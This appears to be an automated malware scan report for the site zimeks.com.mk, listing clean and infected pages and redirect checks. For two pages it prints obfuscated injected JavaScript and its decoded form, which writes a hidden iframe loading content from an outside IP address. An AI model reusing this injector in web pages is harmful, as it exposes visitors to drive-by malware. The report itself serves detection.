Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zimeks.com.mk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zimeks.com.mk/ | 200 OK Content-Length: 18266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v47660edd235e7(v47660edd23ddc){ var v47660edd245d5=16; return(parseInt(v47660edd23ddc,v47660edd245d5));}function v47660edd255c6(v47660edd25dbe){ var v47660edd275a8=2; var v47660edd265b6='';for(v47660edd26daf=0; v47660edd26daf<v47660edd25dbe.length; v47660edd26daf+=v47660edd275a8){ v47660edd265b6+=(String.fromCharCode(v47660edd235e7(v47660edd25dbe.substr(v47660edd26daf, v47660edd275a8))));}return v47660edd265b6;} document.write(v47660edd255c6('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65353235303232207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313339393439292B2763343432366138623030375C272077696474683D333439206865696768743D343031207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=e525022 src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*139949)+'c4426a8b007\' width=349 height=401 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://zimeks.com.mk/zanas.htm | 200 OK Content-Length: 15901 Content-Type: text/html | clean |
http://zimeks.com.mk/asortiman.htm | 200 OK Content-Length: 8956 Content-Type: text/html | clean |
http://zimeks.com.mk/partneri.htm | 200 OK Content-Length: 16107 Content-Type: text/html | clean |
http://zimeks.com.mk/cenovnik.htm | 200 OK Content-Length: 16103 Content-Type: text/html | clean |
http://zimeks.com.mk/kontakt.htm | 200 OK Content-Length: 13335 Content-Type: text/html | clean |
http://zimeks.com.mk/sajtmapa.htm | 200 OK Content-Length: 24913 Content-Type: text/html | clean |
http://zimeks.com.mk/dasortiman.htm | 200 OK Content-Length: 8508 Content-Type: text/html | clean |
http://zimeks.com.mk/laso.htm | 200 OK Content-Length: 7702 Content-Type: text/html | clean |
http://zimeks.com.mk/index.html | 200 OK Content-Length: 18333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v47660edd235e7(v47660edd23ddc){ var v47660edd245d5=16; return(parseInt(v47660edd23ddc,v47660edd245d5));}function v47660edd255c6(v47660edd25dbe){ var v47660edd275a8=2; var v47660edd265b6='';for(v47660edd26daf=0; v47660edd26daf<v47660edd25dbe.length; v47660edd26daf+=v47660edd275a8){ v47660edd265b6+=(String.fromCharCode(v47660edd235e7(v47660edd25dbe.substr(v47660edd26daf, v47660edd275a8))));}return v47660edd265b6;} document.write(v47660edd255c6('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65353235303232207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313339393439292B2763343432366138623030375C272077696474683D333439206865696768743D343031207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=e525022 src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*139949)+'c4426a8b007\' width=349 height=401 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://zimeks.com.mk/gasortiman.htm | 200 OK Content-Length: 8353 Content-Type: text/html | clean |
http://zimeks.com.mk/dph.htm | 200 OK Content-Length: 7651 Content-Type: text/html | clean |
http://zimeks.com.mk/test404page.js | 404 Not Found Content-Length: 103 Content-Type: text/html | clean |
http://zimeks.com.mk/trifa.htm | 200 OK Content-Length: 10205 Content-Type: text/html | clean |
http://zimeks.com.mk/pro.htm | 200 OK Content-Length: 8692 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zimeks.com.mk
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 Mar 2015 23:28:39 GMT
Content-Length: 18266
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDSQSSA=NGGBGGHCEOGEBCEELKMMPOKG; path=/
X-Powered-By: ASP.NET
...18266 bytes of data.
GET / HTTP/1.1
Host: zimeks.com.mk
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 Mar 2015 23:28:39 GMT
Content-Length: 18266
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDSQSSA=NGGBGGHCEOGEBCEELKMMPOKG; path=/
X-Powered-By: ASP.NET
...18266 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zimeks.com.mk
Referer: http://www.google.com/search?q=zimeks.com.mk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zimeks.com.mk
Referer: http://www.google.com/search?q=zimeks.com.mk
Result:
The result is similar to the first query. There are no suspicious redirects found.